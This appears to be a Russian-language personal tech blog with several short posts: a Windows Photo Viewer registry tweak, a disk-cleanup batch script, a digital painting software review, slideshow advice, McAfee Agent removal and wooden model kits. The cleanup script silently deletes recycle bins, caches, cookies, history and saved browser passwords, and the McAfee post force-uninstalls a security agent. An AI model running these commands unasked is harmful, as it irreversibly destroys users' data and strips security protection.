Нам может показаться что больше нет привычного Photo windows photo viewer-а. Даже когда правым кликом по картинке мы вызываем контекстное меню «Открыть с помощью», то и там не можем отыскать привычной программы. Но не стоит отчаиваться, все же старый «Просмотр фотографий Windows» в системе есть, но им умолчанию можно открыть только TIF и TIFF изображения. 

Т.е. ему нужно подсказать про остальные форматы изображений через реестр Windows.

Делается это просто правкой ветки с добавлением следующих значений ключей

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Photo Viewer\Capabilities\FileAssociations]

".tif"="PhotoViewer.FileAssoc.Tiff"

".tiff"="PhotoViewer.FileAssoc.Tiff"

".jpg"="PhotoViewer.FileAssoc.Tiff"

".jpeg"="PhotoViewer.FileAssoc.Tiff"

".png"="PhotoViewer.FileAssoc.Tiff"

".bmp"="PhotoViewer.FileAssoc.Tiff"

Далее, например, при открытии любого jpg-файла вам надо будет подтвердить "Всегда открывать с помощью  «Просмотр фотографий Windows» который уже будет в списке возможных вьюверов.


Успехов.

Борьба за место под солнцем.

Всем привет.

Не перестаю удивляться нештатным ситуациям когда Windows перестает нормально реагировать на действия пользователя только из-за того что ей не хватает "кислорода". А именно свободного места на диске "С". Особенно актуально это стало с тех пор как все поняли что надо, ой надо, ставить апдейты. Разумеется она их все хранит на том же на диске "С". И постепенно, рука об руку с пользователем, топит сама себя. 

Что можно сделать? Немного. В %-м отношении к занятому месту мне удавалось освободить до 20-ти % места от общего объема. Не более. Это если еще убедить пользователя хранить свои файлы на другом диске, или в облаке.

Если попробовать автоматизировать процесс очистки от того что никак не должно влиять на установленный софт то картина будет следующей:

rem Hibernate off  - отключаем гибернацию
powercfg /hibernate off

rem Clear RecycleBin  - чистим корзину
powershell.exe -ExecutionPolicy bypass -command "& {Clear-RecycleBin -Force}"

rem Clear RecycleBin чистим корзину 2
rd /s c:\$Recycle.Bin
rd /s d:\$Recycle.Bin

rem Clear ТЕМР - чистим врем. папку
erase "%TEMP%\*.*" /f /s /q
erase "%TMP%\*.*" /f /s /q

rem чистим кеш браузеров
rem Clear IE cache
rem Delete Temporary Internet Files:
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8
rem Delete Cookies
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2
rem Delete History
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1
rem Delete Form Data
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16
rem Delete Passwords
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32
rem Delete All
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255
rem Delete All plus files and settings stored by Add-ons
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351


rem Clear Chrome cache
erase "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cache\*.*" /f /s /q
for /D %%i in ("%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cache\*") do RD /S /Q "%%i"


rem Clear Firefox cache
erase "%LOCALAPPDATA%\Mozilla\Firefox\Profiles\*.*" /f /s /q
for /D %%i in ("%LOCALAPPDATA%\Mozilla\Firefox\Profiles\*") do RD /S /Q "%%i"

rem Restorepoint off/on - отключаем ведение тчк восстановления
sysdm.cpl

rem Apps repository - сносим левый софт если таковой имеется.
appwiz.cpl

Из приведенного выше  можно было бы оставить тчк восстановления. Или уменьшить их количество. Также рекомендую переместить назначение глобальных переменных  %TEMP% и %TMP% на другой диск. Также можете удалить профиль того пользователя который вам не нужен на этом ПК.

Успехов.

Инструменты для цифровой живописи.

Всем привет.

Кисти разные важны,

Кисти очень нам нужны.

В далеком 2011-м мне приходилось разбирать альтернативы славному бренду всех фото-художников - редактору Adobe Photoshop. Почему я это делал? А мне был интересно насколько его популярность вжилась в умы наших пользователей. И да, есть ли ему здоровая, красивая, и желательно бесплатная альтернатива. Есть!

Там же из солидного списка конкурентов тогда выпал прекрасный GIMP. Ничего не имею против него, просто так сложилось.

Сегодня по случаю нового проекта опять пришлось вернуться к выбору. Ибо, таки да, мой друг Paint.NET нет тянет некоторые творческие моменты.

И вот нахожу такой вот обзор инструментов "для цифровой живописи". Из него я опускаю только ArtWeaver. А из остальных надо будет сделать правильный выбор.

Слово Светлане Шляхтиной.

Спрос на традиционную живопись, наверное, всегда останется столь же высоким, как и несколько веков назад. Однако всё чаще находит применение и цифровая живопись, например при оформлении книг и создании плакатов. Удивляться этому не приходится, ведь создание иллюстраций на компьютере (в сравнении с традиционным рисованием) требует гораздо меньше времени — здесь можно быстрее выбрать нужный инструмент и желаемый цвет (не нужно утомительно смешивать краски), изменить фактуру холста или освещение и пр. Кроме того, в арсенале цифрового художника оказывается множество дополнительных и весьма полезных функций. В частности, можно мгновенно отменить неудачное действие, сохранить несколько копий изображения на разных стадиях его создания (с целью сравнения результатов и выбора наилучшего), защитить конкретный фрагмент рисунка от изменений при выполнении каких­либо операций, а также рисовать на нескольких слоях. Последнее необходимо при создании рисунков в технике многослойной живописи и существенно облегчает работу в других техниках, так как разные фрагменты изображения могут рисоваться на разных слоях и редактироваться независимо друг от друга.

Таким образом, вопрос лишь в том, какой из предлагаемых программных продуктов взять на вооружение при создании цифровых иллюстраций. Большинство профессионалов давно сделали свой выбор в пользу связки Corel Painter и Adobe Photoshop и, как правило, применяют их в комплексе. Разумеется, в действительности последний пакет (при всех его многочисленных достоинствах) мало подходит на роль инструмента живописца, поскольку в большей степени ориентирован на обработку снимков. Однако по причине огромной популярности он используется для решения самых разнообразных задач по созданию и обработке изображений. Спору нет — рисовать с нуля в Adobe Photoshop можно (равно как и в любом другом графическом редакторе), поскольку основа для рисования в виде кистей и палитры присутствует в любом подобном приложении. Сложность в том, что настройка кистей и палитр, требуемых для имитации выбранной художественной техники (о разнообразии живописных техник, разумеется, речь тут не идет, но создание акварели, рисунка пастелью или масляными красками вполне реально), потребует много времени и знаний.

Иное дело - программы, ориентированные на художников. Они позволяют рисовать на компьютере, имитируя традиционные изобразительные техники, природные материалы и краски, без излишних усилий и с применением классических навыков рисования на бумаге и холсте. Например, для рисования акварелью в профессиональном решении от художника потребуется лишь выбрать нужный вид акварельной кисти, при этом необходимые настройки кисти и специальный акварельный слой программа создаст сама. Самое известное (но и самое дорогое) среди подобных решений - пакет Corel Painter, предоставляющий широкие возможности для создания настоящих шедевров изобразительного искусства. В качестве наиболее достойных альтернатив ему можно назвать приложения TwistedBrush Pro Studio и ArtRage Studio, более скромные по размерам и предлагаемые по более демократичной цене. Имеются и совсем простые и дешевые (либо даже бесплатные) инструменты для рисования, функционала которых будет вполне достаточно для любителей, например Artweaver Plus.

Отметим, что приложения для живописи, как правило, спроектированы специально для Tablet PC и графических планшетов, поэтому их пользовательский интерфейс рассчитан на управление пером, заменяющим мышь. Это и понятно, ведь рисовать пером гораздо удобнее и более естественно, чем мышью. Кроме того, перо, в отличие от мыши, чувствительно к нажиму, что дает возможность создавать мазки, постепенно сходящие на нет, которые оказываются идентичными мазкам кисти на полотне. При желании в любом из данных приложений можно работать и обычным на компьютере образом - то есть с помощью мыши. Готовые шедевры сохраняются в собственных форматах программ либо экспортируются в популярные растровые форматы (BMP, PNG, JPEG и др.), во всех достойных решениях также предусмотрена поддержка формата PSD для сохранения многослойных изображений.

Как делать гармоничные слайд-шоу?

Всем привет.

Как сделать красивое слайд-шоу? После этого вопроса вас обычно отсылают к популярному инструменту. И подробно, или не очень, рассказывают про его возможности и пункты меню.

Я этого делать не буду. Я просто укажу на те нюансы которые надо соблюдать в слайд-шоу независимо от инструмента которым вы будете пользоваться.

Простое слайд-шоу состоит из фотографий, или рисунков, переходов между ними и звуковой дорожки.

Первое - это размерность. Соблюдайте ее. Каждый слайд должен быть показан не более 7-8 секунд включая переход. При этом учтите что переход может быть как входящим так и исходящим. Также не делайте длительность слайда почти такую же как и самого перехода.

Второе это само движение слайда. Эффект движения может быть абсолютно разным, но вам не следует его делать главным. Зритель должен увидеть само фото, а не оценивать его замысловатое движение по экрану. Не злоупотребляйте круговым вращением от слайда к слайду. Не "закручивайте" зрителя. Если эффект затрагивает подложку (background) сразу установите ее белым цветом. Эффект движения или преобразования слайда через черный цвет смотрится негативно.

Третье - звуковая дорожка. Если она без слов это одно. Если это песня на английском, не поленитесь, прочтите лирику отдельно, чтобы она была в тему вашего шоу. Если ваше шоу для девушки, не ставьте песню в женском исполнении. Точно также не ставьте мужской голос для вашего друга. Перед тем как расставлять длительность каждого слайда установите начало вашего саундтрека. Далее делайте так чтобы каждый куплет или переход звука совпадал со сменой слайда. Идите от начала каждый раз прослушивая показ видео и звука и правьте длительность каждого слайда последовательно. Заодно редактируйте смысловую нагрузку слайда в паре со звуком, меняйте слайды местами если надо. Да, это нелегко, за одно слайд-шоу пришлось прослушать песню более 50-ти раз к ряду. Но оно того стоило!

Напоследок - растягивайте панорамные фото на весь кадр (fit to frame). Под вертикальные фото крепите подложку с размытым фокусом (blur), чтобы она сильно не отвлекала.

Успехов.

Как еще удалить McAfee Agent.

Всем привет.

Кто сталкивался тот знает что удалить McAfee VirusScan Enterprise не проблема. Штатно из списка приложений, по кнопке "Удалить". А вот с McAfee Agent такой фокус не проходит. Много чего зависит от режима работы самого агента.

Статья об удалении размещена в базе знаний MacAfee по адресу:

https://kc.mcafee.com/corporate/index?page=content&id=KB65863

Но чтобы не тратить свое время вывод из нее следующий: смотря какая версия McAfee Agent у вас установлена, в строке Выполнить набрать:

"c:\Program Files\McAfee\Common Framework\frminst.exe" /forceuninstall

или

"c:\Program Files\Network Associates\Common Framework\frminst.exe" /forceuninstall 

В принципе вам просто надо найти frminst.exe и выполнить его с указанным ключиком.

Бывает что и после этого следы от McAfee остаются в системе, и мешают установке другой антивирусной программы. В таком случае для полной зачистки следов может помочь утилита mcpr.exe которую можно скачать здесь же: 

http://download.mcafee.com/products/licensed/cust_support_patches/MCPR.exe

Внимание - McAfee VirusScan Enterprise должен быть деинсталирован первым.

Успехов.

Мельница для 12-ти и старше.

Всем привет.

Как известно взрослые отличаются от самих себя в детстве только стоимостью игрушек. Не будем делать вид что мы чем-то очень отличаемся.)

Вот и сегодня речь пойдет про конструкторы для тех кому за 16-ть. Мне оказалась интересной тенденция их развития, а конкретно это деревянные конструкторы. Ранее я обращал ваше внимание на украинскую кампанию Ukranian Gears, которая  на сегодня хорошо стоит на ногах. Ее продукция отлично продается за рубежом. Она каждый год выпускает новые модели, которые становятся все сложнее и сложнее. В прошлом месяце они выпустили макет мельницы. 

Смотрите, это просто взрыв мозга. Все модели Ugears стремится делать максимально функциональными.  Надо проверить, возможно эта мельница может молоть... Ребята, вы супер! Так держать.